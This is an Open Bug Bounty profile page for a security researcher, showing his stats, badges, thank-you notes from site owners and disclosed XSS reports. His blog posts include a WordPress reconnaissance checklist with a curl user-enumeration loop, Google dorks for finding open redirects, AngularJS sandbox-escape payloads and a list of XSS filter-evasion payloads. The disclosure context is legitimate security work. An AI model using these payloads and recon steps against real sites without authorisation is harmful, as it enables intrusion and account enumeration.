Coordinated and Responsible Vulnerability Disclosure Free Bug Bounty Program 456,207 coordinated disclosures
244,324 fixed vulnerabilities
604 bug bounties with 1224 websites
12,316 researchers, 962 honor badges

MiguelSantareno | Security Researcher Profile


Security researcher MiguelSantareno has already helped fix 950 vulnerabilities.



Researcher reputation:  140

Real name:
Miguel Santareno

About me:
http://miguelsantareno.eu

https://hackerone.com/miguel_santareno

https://bugcrowd.com/MiguelSantareno

https://www.exploit-db.com/google-hacking-database author 9699

http://www.hackersforcharity.org/community/index.php/profile/395-miguel-santareno/

https://pentesterlab.com/profile/Miguelsantareno

https://www.hackthebox.eu/profile/19625

How to contact me:
https://twitter.com/MiguelSantareno

https://www.linkedin.com/in/miguelsantareno/

Alternative Contacts:
[email protected]

Certifications & Diplomas:
MTA Security Essentials
CEH
CPTE
ISO/IEC 27001

Experience in Application Security
1-3 years

Award / Bug Bounty I prefer:
Recommendations.
Swag.
Money.

Halls of Fame:
Midas Vodafone Portugal NOS MyHeritage OracleBosch General Motors Khan Academy Impinj U.S. Dept Of Defense Alibaba CERT-EU Ford Telefnica Germany RATELIMITED
Informatica IBM BMW Overstock's

Follow me on:
Twitter

Recommendations and Acknowledgements

    17 July, 2018
     DragonSGA Stefan from Cadenas:
Miguel has found a XSS vulnerability in our search page. The example he gave helped to test our fix. Thank you!
    15 May, 2018
     Lewisdh47 Dave from Avis:
I would like to thank Miguel for identifying the security issue, providing all relevant information to enable a fix to be deployed and confirming the resolution. Incredibly useful to get his input on the issue and his very helpful steps to reproduce were appreciated. Very helpful and friendly.
    9 May, 2018
     bubblegate James Murrells from Bubblegate:
Identified an XSS vulnerability on our website and was very friendly and supportive! Many thanks.
    26 September, 2017
     pmiguelr75 Pedro Rodrigues from Bluesoft:
Identified an XSS vulnerability in one website and show us where is it.
After that made changes in code to solve it
All solved.
Great help, great support.
    22 September, 2017
     thenrique Tulio from Spirit Fanfics:
dentified an XSS vulnerability in our website and provided all the details in order to solve it. Very friendly. Thanks
    22 September, 2017
     jonnyowls Jonathan from C5:
Miguel reported a XSS vulnerability in our website, it was remediated and retested very quickly. Excellent service
    1 September, 2017
     maswb19 Jay from PSA:
Helpfully notified us of an XSS vulnerability in one of our sites with the details we needed to replicate it and responded quickly to emails.
    10 August, 2017
     tgljamesuk James from The Graphics Line:
Miguel identified an XSS vulnerability one of our websites, provided a step by step guide to reproduce the issue along with information on how to resolve it. He also re-tested after we applied a patch. Thank you Miguel!
    27 July, 2017
     ISOatUO Information Security Office from University of Otago:
Provided a simple proof of concept, allowing us to identify the cause easily and deploy a fix quickly.
    26 July, 2017
     kovyrin Oleksiy Kovyrin from Swiftype Inc:
Miguel has identified an XSS vulnerability on our website, provided us with necessary details to reproduce the issue and was very helpful re-testing after we applied the fixes. Thank you.

Shows the first 10 recommendations. See all.

Please login via Twitter to add a recommendation

Honor Badges


Number of Secured Websites

10+ Websites
50+ Websites
500+ Websites
WEB SECURITY VETERAN
1000+ Websites

Advanced Security Research

WAF Bypasser
CSRF Master
30+ Reports
AppSec Logic Master
30+ Reports
Fastest Fix
Fix in 24 hours

Outstanding Achievements

Secured OBB
OBB Advocate
Improved OBB

Commitment to Remediate and Patch

Patch Master
55% Patched
Patch Guru
65% Patched
Patch Lord
75% Patched

Recommendations and Recognition

REPUTABLE
10+ Recommends
FAMOUS
25+ Recommends
GLOBALLY TRUSTED
50+ Recommends

Distinguished Blog Author

1 Post
3 Posts
5+ Posts

Research Statistics



Total reports:1290
Total reports on VIP sites:85
Total patched vulnerabilities:950
Recommendations received:14
Active since:20.06.2017

Open Bug Bounty Certificate



05.09.2019  Wordpress basic auditing

Wordpress Read me
target/readme.html

Wordpress License with wordpress version
target/license.txt

Wordpress sample config:
target/wp-config-sample.php

Wordpress installation:
target/wp-admin/install.php

Wordpress upgrade file:
target/wp-admin/upgrade.php

Wordpress setup config:
target/wp-admin/setup-config.php

Wordpress Api usefull paths:
target/wp-json/wp/v2/users - enumerate users
target/wp-json/wp/v2/posts - enumerate posts
target/wp-json - wordpress api

Script to enumerate users thought authors of blog:
for i in {1..30}; do curl -s -L -i target | grep -E -o "\" title=\"View all posts by [a-z0-9A-Z-.]|Location:." | sed 's/\// /g' | cut -f 6 -d ' ' | grep -v "^$"; done

Wordpress Plugins readme or license:
target/wp-content/plugins/plugin name/readme.txt or /license.txt

Wordpress Theme readme or license:
target/wp-content/theme/nome-do-theme/readme.txt, /changeglog.txt or /license.txt

05.09.2019  Payloads for all type off web attacks

02.04.2019  Google Dorks to find open redirects:

inurl:url=https
inurl:url=http
inurl:u=https
inurl:u=http
inurl:redirect?https
inurl:redirect?http
inurl:redirect=https
inurl:redirect=http
inurl:link=http
inurl:link=https

02.04.2019  Cross Site Script angular payloads:

1.0.1 - 1.1.5

Mario Heiderich (Cure53)

{{constructor.constructor('alert(1)')()}}

1.2.0 - 1.2.1

Jan Horn (Google)

{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}

30.03.2019  List off basic Cross site script playloads

"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"--!><img src=x onerror=alert("OPENBUGBOUNTY")> 
'"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
'"><script>alert("OPENBUGBOUNTY")</script>
'"><script>confirm("OPENBUGBOUNTY")</script>
'"><script>prompt("OPENBUGBOUNTY")</script>
'"><svg/onload=alert(/OPENBUGBOUNTY/)>
'"><svg/onload=confirm(/OPENBUGBOUNTY/)>
'"><svg/onload=prompt(/OPENBUGBOUNTY/)>
'>"/><svg/onload=prompt(/OPENBUGBOUNTY/)>
<Img src = x onerror = "javascript: window.onerror = alert; throw XSS">
<img  src="x:gif" onerror="window['al\u0065rt'](0)"></img>
<svg/onload=prompt(/OPENBUGBOUNTY/)>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert("OPENBUGBOUNTY")//>\x3exss.txt

'"><svg/onload=prompt`1`>
'"><svg/onload=alert`1`>
'"><svg/onload=confirm`1`>
'"><script>alert`1`</script> 
><script>alert`1`</script> 
'"><svg onload=prompt`openbugbounty`>
'"><svg onload=alert`openbugbounty`>
'"><svg onload=confirm`openbugbounty`>
<!'/*!"/*!/'/*/"/*--!><Input/Autofocus/*/Onfocus=confirm`OPENBUGBOUNTY`//><Svg>/
'"><svg/onload=alert(/openbugbounty/)>

Reported Vulnerabilities

All Submissions VIP Submissions

Domain Reported Status Type
13.09.2018
unpatched
Cross Site Scripting
04.06.2018
unpatched
Cross Site Scripting
02.06.2018
patched
Cross Site Scripting
26.05.2018
patched
Cross Site Scripting
28.04.2018
patched
Cross Site Scripting
16.04.2018
patched
Cross Site Scripting
16.04.2018
unpatched
Cross Site Scripting
16.04.2018
patched
Cross Site Scripting
14.04.2018
patched
Cross Site Scripting
07.04.2018
patched
Cross Site Scripting
29.03.2018
patched
Cross Site Scripting
28.03.2018
patched
Cross Site Scripting
28.03.2018
patched
Cross Site Scripting
28.03.2018
patched
Cross Site Scripting
22.02.2018
patched
Cross Site Scripting
22.02.2018
patched
Cross Site Scripting
22.02.2018
patched
Cross Site Scripting
22.02.2018
patched
Cross Site Scripting
20.02.2018
patched
Cross Site Scripting
18.02.2018
patched
Cross Site Scripting

  Latest Patched

 22.10.2019 biggo.com.tw
 22.10.2019 you2repeat.com
 21.10.2019 bfmtv.com
 21.10.2019 carbon38.com
 21.10.2019 register.it
 21.10.2019 business-standard.com
 21.10.2019 anidb.net
 20.10.2019 k12.com
 20.10.2019 abbreviations.com
 20.10.2019 coldspicy.com

  Latest Blog Posts

17.10.2019 by geeknik
The "S" in IOT is for Security
16.10.2019 by darknetguy
Best XSS Vectors
01.10.2019 by Renzi25031469
#Security 100%
18.09.2019 by Leon
SSRF | Reading Local Files from DownNotifier server
13.09.2019 by drok3r
Collection of information | Google Hacking and Dorks basic

  Recent Recommendations

    22 October, 2019
     retyork1:
Thanks Andre for providing a very professional service. Your report provided all the information that we needed in order to rectify the XSS vulnerability that you have discovered.
    22 October, 2019
     kifayat70677834:
Many thanks to Faizan_mark for letting us know of a vulnerability and some suggested solutions.
    22 October, 2019
     pritamk03158321:
Thank you Faizan_mark for helping us identify an XSS, really appreciated! The description of the vulnerability was clear and allowed us to make a fix quickly.
    22 October, 2019
     Jannyhan3:
Thank you so much for reporting the security issue and bringing this to our attention. We highly appreciate your time and professional skills in helping to make Driver Easy more secure.
We're working on the issue and will update with you when we fix it.
Thanks again for everything.
    21 October, 2019
     Alansharma19:
Thanks very much for the report!
We were sure that everything was proteced, but apparently we missed some special places where the escaping wasn't sufficient.
It is now fixed.